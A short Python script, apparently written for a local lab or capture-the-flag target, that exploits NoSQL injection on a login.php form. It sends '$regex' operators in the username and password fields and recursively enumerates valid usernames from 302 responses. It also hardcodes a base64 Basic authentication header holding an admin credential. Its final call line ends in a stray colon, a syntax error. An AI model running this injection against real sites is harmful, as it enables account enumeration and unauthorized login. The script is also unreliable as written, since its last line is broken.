import requests
import string

url = "http://localhost:8080/login.php"
headers = {"Host": "localhost:8080", "Authorization": "Basic YWRtaW46WTN0aVN0YXJDdXIhb3VzcGFzc3dvcmQ9YWRtaW4="}
cookies = {}
possible_chars = list(string.ascii_letters) + list(string.digits) + ["\\"+c for c in string.punctuation+string.whitespace ]

def get_usernames(prefix):
    usernames = []
    params = {"username[$regex]":"", "password[$regex]":".*"}
    for c in possible_chars:
        username = "^" + prefix + c
        params["username[$regex]"] = username + ".*"
        pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
        if int(pr.status_code) == 302:
            print(username)
            for user in get_usernames(prefix + c):
                usernames.append(user)
    return usernames

print("running")
get_usernames(""):